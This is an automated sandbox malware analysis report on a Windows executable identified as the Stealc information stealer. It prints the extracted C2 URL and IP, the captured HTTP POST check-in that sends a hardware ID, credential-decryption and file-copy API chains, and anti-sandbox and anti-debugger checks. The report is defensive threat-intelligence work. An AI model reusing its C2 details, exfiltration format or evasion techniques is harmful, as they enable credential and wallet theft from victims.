

Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1520515
MD5: fb6e05d5c008f119efcdeefe60d6e924
SHA1: 76fca4e5da3cff2eee99634b2f442850000ce47f
SHA256: b01a2006b9ca98754e6c54ea5940b99dba53720fd9f0b83a4024a7061723f90d
Tags: exe, user-Bitsight
Infos:

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7656 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FB6E05D5C008F119EFCDEEFE60D6E924)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: dump.pcap | Rule: JoeSecurity_Stealc_1 | Description: Yara detected Stealc | Author: Joe Security

Source: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.1448686604.00000000008DE000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000003.1400847337.0000000004E20000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: Process Memory Space: file.exe PID: 7656 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: Process Memory Space: file.exe PID: 7656 | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

Source: 0.2.file.exe.e10000.0.unpack | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

No Sigma rule has matched

Timestamp: 2024-09-27T12:53:04.908577+0200 | SID: 2044243 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP: 192.168.2.8 | Source Port: 49705 | Destination IP: 185.215.113.37 | Destination Port: 80 | Protocol: TCP


AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.e10000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: file.exe | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 0_2_00E1C820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E19AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00E19AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E17240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00E17240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E19B60 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00E19B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E28EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_00E28EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00E238B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E24910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00E24910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00E1DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00E1E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E24570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00E24570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00E1ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00E116D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E23EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00E23EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00E1F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00E1BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00E1DE10

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49705 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJEGCGDGHCBFHIDHDAA Host: 185.215.113.37 Content-Length: 209 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 43 47 44 47 48 43 42 46 48 49 44 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 36 35 30 30 44 33 45 43 43 30 35 38 34 39 32 38 30 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 43 47 44 47 48 43 42 46 48 49 44 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 43 47 44 47 48 43 42 46 48 49 44 48 44 41 41 2d 2d 0d 0a Data Ascii: ------JJJEGCGDGHCBFHIDHDAAContent-Disposition: form-data; name="hwid"706500D3ECC058492808------JJJEGCGDGHCBFHIDHDAAContent-Disposition: form-data; name="build"save------JJJEGCGDGHCBFHIDHDAA--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E14880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_00E14880
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJEGCGDGHCBFHIDHDAA Host: 185.215.113.37 Content-Length: 209 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 43 47 44 47 48 43 42 46 48 49 44 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 36 35 30 30 44 33 45 43 43 30 35 38 34 39 32 38 30 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 43 47 44 47 48 43 42 46 48 49 44 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 43 47 44 47 48 43 42 46 48 49 44 48 44 41 41 2d 2d 0d 0a Data Ascii: ------JJJEGCGDGHCBFHIDHDAAContent-Disposition: form-data; name="hwid"706500D3ECC058492808------JJJEGCGDGHCBFHIDHDAAContent-Disposition: form-data; name="build"save------JJJEGCGDGHCBFHIDHDAA--
Source: file.exe, 00000000.00000002.1448686604.00000000008DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1448686604.0000000000939000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1448686604.0000000000942000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1448686604.0000000000939000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1448686604.0000000000955000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1448686604.0000000000942000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1448686604.0000000000939000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php8
Source: file.exe, 00000000.00000002.1448686604.0000000000939000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpT
Source: file.exe, 00000000.00000002.1448686604.0000000000942000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpo
Source: file.exe, 00000000.00000002.1448686604.0000000000939000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010BA14D 0_2_010BA14D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E0944 0_2_011E0944
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E79ED 0_2_011E79ED
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E4039 0_2_011E4039
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011D502C 0_2_011D502C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0126E098 0_2_0126E098
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0113DBD4 0_2_0113DBD4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011D6A30 0_2_011D6A30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011ECAC7 0_2_011ECAC7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A251D 0_2_011A251D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011D35B9 0_2_011D35B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E5DB5 0_2_011E5DB5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010B0DE9 0_2_010B0DE9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011DD404 0_2_011DD404
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E245E 0_2_011E245E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011D9F77 0_2_011D9F77
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011D0608 0_2_011D0608
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01190E95 0_2_01190E95
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011DEE87 0_2_011DEE87
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0114CEE5 0_2_0114CEE5
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00E145C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: fychohlw ZLIB complexity 0.9948268103513269
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E28680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 0_2_00E28680
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E23720 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 0_2_00E23720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\42DP348H.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 42%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1853952 > 1048576
Source: file.exe | Static PE information: Raw size of fychohlw is bigger than: 0x100000 < 0x19e800

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.e10000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fychohlw:EW;iljhrjsp:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fychohlw:EW;iljhrjsp:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E29860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00E29860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1d448f should be: 0x1ce396
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: fychohlw
Source: file.exe | Static PE information: section name: iljhrjsp
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012AD92A push 4CA49574h; mov dword ptr [esp], esp 0_2_012AD9E1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012AD92A push eax; mov dword ptr [esp], edx 0_2_012ADA49
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012AD92A push 6560EDE0h; mov dword ptr [esp], esi 0_2_012ADC42
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012FE927 push 1D7584A4h; mov dword ptr [esp], esi 0_2_012FE94D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012E116D push 6D2553E1h; mov dword ptr [esp], ecx 0_2_012E11BD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010BA14D push 3706B6A1h; mov dword ptr [esp], esi 0_2_010BA252
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010BA14D push 262A28D6h; mov dword ptr [esp], eax 0_2_010BA2A6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010BA14D push edx; mov dword ptr [esp], 25A19BA8h 0_2_010BA2BA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010BA14D push eax; mov dword ptr [esp], edx 0_2_010BA34B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010BA14D push edx; mov dword ptr [esp], 71AF9F4Eh 0_2_010BA38B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01213979 push ebx; mov dword ptr [esp], edi 0_2_0121398D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01213979 push eax; mov dword ptr [esp], 7B4BA17Ah 0_2_0121399B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01213979 push edx; mov dword ptr [esp], 6F1FECD6h 0_2_012139BB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E0944 push 704BAC81h; mov dword ptr [esp], edx 0_2_011E095F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E0944 push 3DBAA091h; mov dword ptr [esp], edx 0_2_011E0969
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E0944 push 67E0AA7Ch; mov dword ptr [esp], ecx 0_2_011E09C9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E0944 push esi; mov dword ptr [esp], 06263BF7h 0_2_011E0A0D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E0944 push edi; mov dword ptr [esp], esp 0_2_011E0AE7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E0944 push 7FB5EC5Bh; mov dword ptr [esp], eax 0_2_011E0B57
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E0944 push edx; mov dword ptr [esp], esi 0_2_011E0B83
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E0944 push 2A932AC1h; mov dword ptr [esp], ecx 0_2_011E0BE5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E0944 push 0B7C37FFh; mov dword ptr [esp], eax 0_2_011E0BFF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E0944 push eax; mov dword ptr [esp], ebx 0_2_011E0C0C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E0944 push 1950D316h; mov dword ptr [esp], edx 0_2_011E0C53
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E0944 push eax; mov dword ptr [esp], esp 0_2_011E0C7A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E0944 push edx; mov dword ptr [esp], eax 0_2_011E0C96
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E0944 push ecx; mov dword ptr [esp], esi 0_2_011E0DC3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E0944 push 1C760437h; mov dword ptr [esp], ebp 0_2_011E0DD9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E0944 push eax; mov dword ptr [esp], esp 0_2_011E0E8F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E0944 push edx; mov dword ptr [esp], 0D010565h 0_2_011E0EB9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E0944 push 7A266EC4h; mov dword ptr [esp], ebx 0_2_011E0F0A
Source: file.exe | Static PE information: section name: fychohlw entropy: 7.953428588983157

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E29860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00E29860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-13360
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11F23C1 second address: 11F23F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790E17D78h 0x00000007 jmp 00007F0790E17D6Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11F23F1 second address: 11F23F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11F144A second address: 11F144E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11F1834 second address: 11F1870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07913FD82Fh 0x00000007 jmp 00007F07913FD835h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F07913FD830h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11F1870 second address: 11F1874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11F19FE second address: 11F1A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11F1A02 second address: 11F1A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnp 00007F0790E17D66h 0x00000011 pop eax 0x00000012 jnl 00007F0790E17D6Ch 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11F1B8A second address: 11F1B8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11F1B8E second address: 11F1B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11F1CB0 second address: 11F1CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F07913FD828h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11F37A1 second address: 11F37B3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jne 00007F0790E17D70h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
